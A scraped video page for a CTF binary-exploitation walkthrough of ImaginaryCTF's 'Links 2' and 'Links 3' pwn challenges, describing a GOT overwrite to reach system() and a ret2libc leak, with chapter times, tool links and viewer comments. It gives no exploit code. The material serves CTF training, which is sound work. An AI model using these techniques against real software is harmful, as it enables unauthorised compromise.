Linked List Exploit Continued - GOT Overwrite - "Links 2+3" Pwn Challenge [ImaginaryCTF]

Подписаться 34 тыс.

Просмотров 2,1 тыс.

50% 1

"Links 2" (Pwn) challenge from ImaginaryCTF (iCTF) 27/06/22 - "It turns out that there was a bug in how I was handling writing some elements, so I've fixed that. Also, I've stopped putting the flag in a global variable, because that's probably not a good idea. Double check my implementation one more time for me?". In this challenge we'll use Ghidra, GDB-PwnDbg and PwnTools to exploit a vulnerable custom LinkedList implementation by overwriting an global offset table GOT entry to point system(), so we can get a shell.
"Links 3" (Pwn) challenge from ImaginaryCTF (iCTF) 30/06/22 - "And now you guys are exploiting my View Time feature that I put there solely for your convenience? Fine, then - no more time for you!". This challenge has no view_time() function, so we lose the system() call. However, we can leak an arbitrary function from the GOT and use the Lib-C database to find the correct offsets (ret2libc). Hope you enjoy 🙂 #CTF #iCTF #ImaginaryCTF #Pwn #BinaryExploitation
Write-ups: github.com/Crypto-Cat/CTF/tre...
↢Social Media↣
Twitter: / _cryptocat
GitHub: github.com/Crypto-Cat
HackTheBox: app.hackthebox.eu/profile/11897
LinkedIn: / cryptocat
Reddit: / _cryptocat23
RU-vid: / cryptocat23
Twitch: / cryptocat23
↢ImaginaryCTF↣
imaginaryctf.org
/ imaginaryctf
/ discord
↢Video-Specific Resources↣
libc.blukat.me
libc.rip
↢Resources↣
Ghidra: ghidra-sre.org/CheatSheet.html
Volatility: github.com/volatilityfoundati...
PwnTools: github.com/Gallopsled/pwntool...
CyberChef: gchq.github.io/CyberChef
DCode: www.dcode.fr/en
HackTricks: book.hacktricks.xyz/pentestin...
CTF Tools: github.com/apsdehal/awesome-ctf
Forensics: cugu.github.io/awesome-forensics
Decompile Code: www.decompiler.com
Run Code: tio.run
↢Chapters↣
Start: 0:00
Links 1 Recap: 0:30
Reviewing Heap Layout in GDB-PwnDbg: 3:25
Keeping the Heap intact: 7:45
Links 2 Attack Plan: 11:55
Overwriting the GOT: 16:48
Stack Alignment: 20:08
Solution (leak system): 23:27
Links 3 (leak another lib-c function): 28:08
Recap: 33:27
End: 34:29

Наука

Опубликовано:

1 июл 2024

Ссылка:

Скачать:

Готовим ссылку...

Добавить в:

Мой плейлист

Посмотреть позже

Комментарии : 8

@_CryptoCat 2 года назад

Write-ups: github.com/Crypto-Cat/CTF/tree/main/ctf_events/ictf/pwn/links Added some corrections there as well, e.g. we could of used the plt.system address instead of got.system to get around the stack alignment issue, rather than leaking Lib-C.

@coolestguy6757 2 года назад

yuhhhh return of the king 😈😈😈

@_CryptoCat 2 года назад

👊

@_hackwell 2 года назад

Learnt new things. Thanks a lot 🙏 Last time I tried to overwrite the GOT with partial RELRO I got segfault and my offsets were right. Had to find a pointer to another writable area inside the header. Dunno why...

@_CryptoCat 2 года назад

Thanks mate, I learnt some new things on these ones too! That's weird with the GOT overwrite, should normally work with partial-RELRO 🤔

@_hackwell 2 года назад

@@_CryptoCat I might have done something the wrong way also 🤔 I need to investigate more because weird things happened even though my exploit worked just fine locally and remotely . Each binexp is different and that's where the fun is 😁

@Omniscient2 Год назад

hi bro please help why can i have this in evil-winrm Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization \error

@_CryptoCat Год назад

It's a problem with the OpenSSL version: forum.hackthebox.com/t/evil-winrm-error-on-connection-to-host/257342 You can update your OpenSSL library OR use this quick fix: forum.hackthebox.com/t/lab-access-openvpn-certificate-verify-failed/257102/2